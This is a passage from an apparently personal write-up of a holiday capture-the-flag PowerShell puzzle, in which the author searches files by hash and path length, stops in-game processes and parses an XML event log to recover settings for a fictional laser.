&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;extracted_archive&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;refraction&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;dir&lt;/span&gt;


&lt;span class="go"&gt;    Directory: /home/elf/extracted_archive/refraction&lt;/span&gt;

&lt;span class="go"&gt;Mode                LastWriteTime         Length Name&lt;/span&gt;
&lt;span class="go"&gt;----                -------------         ------ ----&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;------           11/7/19 11:57 AM            134 riddle&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;------           11/5/19  2:26 PM        5724384 runme.elf&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The archive contains an ELF binary, and a riddle. First, let's run the ELF
binary. I didn't manage to run it from the box, so I extracted it, by base64
encoding it, and then decoding it on a Linux box. I was then able to run it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;user@debian:~$&lt;/span&gt; ./powershell_elf.bin
&lt;span class="hll"&gt;&lt;span class="go"&gt;refraction?val=1.867&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives us the correct value for the refraction variable. Now, let's look
at the &lt;code&gt;riddle&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-Content&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;riddle&lt;/span&gt;
&lt;span class="go"&gt;Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:&lt;/span&gt;

&lt;span class="go"&gt;25520151A320B5B0D21561F92C8F6224&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, we must look for a file in the &lt;code&gt;/home/elf/depths&lt;/code&gt; folder, with an
MD5 sum equal to &lt;code&gt;25520151A320B5B0D21561F92C8F6224&lt;/code&gt;. Let's take a look:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="o"&gt;-file&lt;/span&gt; &lt;span class="n"&gt;-recurse&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;depths&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;get-filehash&lt;/span&gt; &lt;span class="n"&gt;-algorithm&lt;/span&gt; &lt;span class="n"&gt;MD5&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;where-object&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;HASH&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;25520151A320B5B0D21561F92C8F6224&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Format-List&lt;/span&gt;

&lt;span class="go"&gt;Algorithm : MD5&lt;/span&gt;
&lt;span class="go"&gt;Hash      : 25520151A320B5B0D21561F92C8F6224&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Path      : /home/elf/depths/produce/thhy5hll.txt&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The file with an MD5 sum of &lt;code&gt;25520151A320B5B0D21561F92C8F6224&lt;/code&gt; seems to
be &lt;code&gt;/home/elf/depths/produce/thhy5hll.txt&lt;/code&gt;. Let's look inside:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-Content&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;home&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;depths&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;produce&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;thhy5hll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;txt&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;temperature?val=-33.5&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;I am one of many thousand similar txt&amp;#39;s contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName&amp;#39;s to Sort Length.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have the correct value for the temperature, &lt;code&gt;-33.5&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Apparently, the new file to find is the one with the longest full name in
&lt;code&gt;/home/elf/depths&lt;/code&gt;. Let's list the file and sort them by their
&lt;code&gt;FullName&lt;/code&gt; attribute:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf/&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="o"&gt;-file&lt;/span&gt; &lt;span class="n"&gt;-recurse&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;home&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;depths&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;sort &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;  &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FullName&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;select-object&lt;/span&gt; &lt;span class="n"&gt;-property&lt;/span&gt; &lt;span class="n"&gt;FullName&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;fl&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;FullName : /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/&lt;/span&gt;
&lt;span class="go"&gt;           escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/p&lt;/span&gt;
&lt;span class="go"&gt;           ractical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/da&lt;/span&gt;
&lt;span class="go"&gt;           wn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soo&lt;/span&gt;
&lt;span class="go"&gt;           n/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;gc &lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;home&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;elf&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;depths&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;larger&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;cloud&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;behavior&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;beauty&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;enemy&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;produce&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;chair&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;unknown&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;escape&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;vote&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;long&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;writer&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;behind&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ahead&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;thin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;occasionally&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;explore&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;tape&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;wherever&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;practical&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;therefore&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;cool&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plate&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ice&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;play&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;truth&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;potatoes&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;beauty&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;fourth&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;careful&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dawn&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;adult&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;either&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;burn&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="k"&gt;end&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;accurate&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;rubbed&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;cake&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;she&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;threw&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;eager&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;trip&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;soon&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;think&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;fall&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;is&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;greatest&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;become&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;accident&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;labor&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sail&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dropped&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;fox&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;0jhj5xz6&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;txt&lt;/span&gt;
&lt;span class="go"&gt;Get process information to include Username identification. Stop Process to show me you&amp;#39;re skilled and in this order they must be killed:&lt;/span&gt;

&lt;span class="go"&gt;bushy&lt;/span&gt;
&lt;span class="go"&gt;alabaster&lt;/span&gt;
&lt;span class="go"&gt;minty&lt;/span&gt;
&lt;span class="go"&gt;holly&lt;/span&gt;

&lt;span class="go"&gt;Do this for me and then you /shall/see .&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once we find the file with the longest name, we're tasked with a new challenge.
We must kill the processes of the given users, in this particular order. Let's
list the processes and kill them:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-Process&lt;/span&gt; &lt;span class="n"&gt;-IncludeUserName&lt;/span&gt;

&lt;span class="go"&gt;     WS(M)   CPU(s)      Id UserName                       ProcessName&lt;/span&gt;
&lt;span class="go"&gt;     -----   ------      -- --------                       -----------&lt;/span&gt;
&lt;span class="go"&gt;     26.84     1.86       7 root                           CheerLaserServi&lt;/span&gt;
&lt;span class="go"&gt;    184.41    61.33      32 elf                            elf&lt;/span&gt;
&lt;span class="go"&gt;      3.56     0.04       1 root                           init&lt;/span&gt;
&lt;span class="go"&gt;      0.82     0.00      24 bushy                          sleep&lt;/span&gt;
&lt;span class="go"&gt;      0.82     0.00      26 alabaster                      sleep&lt;/span&gt;
&lt;span class="go"&gt;      0.75     0.00      29 minty                          sleep&lt;/span&gt;
&lt;span class="go"&gt;      0.82     0.00      30 holly                          sleep&lt;/span&gt;
&lt;span class="go"&gt;      3.32     0.00      31 root                           su&lt;/span&gt;

&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Stop-Process&lt;/span&gt; &lt;span class="n"&gt;-Id&lt;/span&gt; &lt;span class="n"&gt;24&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Stop-Process&lt;/span&gt; &lt;span class="n"&gt;-Id&lt;/span&gt; &lt;span class="n"&gt;26&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Stop-Process&lt;/span&gt; &lt;span class="n"&gt;-Id&lt;/span&gt; &lt;span class="n"&gt;29&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Stop-Process&lt;/span&gt; &lt;span class="n"&gt;-Id&lt;/span&gt; &lt;span class="n"&gt;30&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After killing the processes, the riddle said that we &lt;code&gt;/shall/see&lt;/code&gt;. Let's
look into the &lt;code&gt;/shall&lt;/code&gt; folder at the root of the file system:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;dir &lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;shall&lt;/span&gt;


&lt;span class="go"&gt;    Directory: /shall&lt;/span&gt;

&lt;span class="go"&gt;Mode                LastWriteTime         Length Name&lt;/span&gt;
&lt;span class="go"&gt;----                -------------         ------ ----&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;--r---          12/23/19  8:55 PM            149 see&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There is indeed a &lt;code&gt;/shall/see&lt;/code&gt; file. Let's get its content:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-Content&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;shall&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;see&lt;/span&gt;
&lt;span class="go"&gt;Get the .xml children of /etc - an event log to be found. Group all .Id&amp;#39;s and the last thing will be in the Properties of the lonely unique event Id.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, there is an event log in XML format in &lt;code&gt;/etc&lt;/code&gt;. We must find the event
with the unique &lt;code&gt;Id&lt;/code&gt;, and the last parameters for the alser will be in
its properties. First, let's find this XML file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf/extracted_archive/refraction&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="n"&gt;-recurse&lt;/span&gt; &lt;span class="o"&gt;-file&lt;/span&gt; &lt;span class="n"&gt;-include&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;*.xml&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;
&lt;span class="go"&gt;Get-ChildItem : Access to the path &amp;#39;/etc/ssl/private&amp;#39; is denied.&lt;/span&gt;
&lt;span class="go"&gt;At line:1 char:1&lt;/span&gt;
&lt;span class="go"&gt;+ Get-ChildItem -recurse -file -include &amp;quot;*.xml&amp;quot; /etc&lt;/span&gt;
&lt;span class="go"&gt;+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;/span&gt;
&lt;span class="go"&gt;+ CategoryInfo          : PermissionDenied: (/etc/ssl/private:String) [Get-ChildItem], UnauthorizedAccessException&lt;/span&gt;
&lt;span class="go"&gt;+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand&lt;/span&gt;



&lt;span class="hll"&gt;&lt;span class="go"&gt;    Directory: /etc/systemd/system/timers.target.wants&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;Mode                LastWriteTime         Length Name&lt;/span&gt;
&lt;span class="go"&gt;----                -------------         ------ ----&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;--r---          11/18/19  7:53 PM       10006962 EventLog.xml&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the event log sits at &lt;code&gt;/etc/systemd/system/timers.target.wants/EventLog.xml&lt;/code&gt;.
We can directly parse the content of the file in PowerShell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="no"&gt;[xml]&lt;/span&gt;&lt;span class="nv"&gt;$event_log&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;gc &lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;systemd&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;timers&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;wants&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;EventLog&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;xml&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, let's take a look at every &lt;code&gt;Id&lt;/code&gt; to see which one is unique:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$event_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Objs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Obj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Props&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;I32&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Id&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;%&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#text&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Group-Object&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Format-Table&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;

&lt;span class="go"&gt;Count Name&lt;/span&gt;
&lt;span class="go"&gt;----- ----&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;    1 1&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;   39 2&lt;/span&gt;
&lt;span class="go"&gt;  179 3&lt;/span&gt;
&lt;span class="go"&gt;    2 4&lt;/span&gt;
&lt;span class="go"&gt;  905 5&lt;/span&gt;
&lt;span class="go"&gt;   98 6&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the unique &lt;code&gt;Id&lt;/code&gt; seems to be &lt;code&gt;1&lt;/code&gt;. Let's list the properties of
the event with &lt;code&gt;Id=1&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$event_log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Objs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Obj&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Props&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;I32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Id&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;-and&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Props&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;I32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#text&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;%&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Props&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Obj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;LST&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Obj&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Props&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;#text&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="go"&gt;2019-11-07 17:59:56.525&lt;/span&gt;
&lt;span class="go"&gt;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&lt;/span&gt;
&lt;span class="go"&gt;10.0.14393.206 (rs1_release.160915-0644)&lt;/span&gt;
&lt;span class="go"&gt;Windows PowerShell&lt;/span&gt;
&lt;span class="go"&gt;Microsoft® Windows® Operating System&lt;/span&gt;
&lt;span class="go"&gt;Microsoft Corporation&lt;/span&gt;
&lt;span class="go"&gt;PowerShell.EXE&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c &amp;quot;`$correct_gases_postbody = @{`n    O=6`n    H=7`n    He=3`n    N=4`n    Ne=22`n    Ar=11`n    Xe=10`n    F=20`n    Kr=8`n    Rn=9`n}`n&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;C:\&lt;/span&gt;
&lt;span class="go"&gt;ELFURESEARCH\allservices&lt;/span&gt;
&lt;span class="go"&gt;High&lt;/span&gt;
&lt;span class="go"&gt;MD5=097CE5761C89434367598B34FE32893B&lt;/span&gt;
&lt;span class="go"&gt;C:\Windows\System32\svchost.exe&lt;/span&gt;
&lt;span class="go"&gt;C:\Windows\system32\svchost.exe -k netsvcs&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives us the values for the gas dosage for the laser. We now have every
parameters to repair the laser.&lt;/p&gt;
&lt;p&gt;First let's update the angle:&lt;/p&gt;
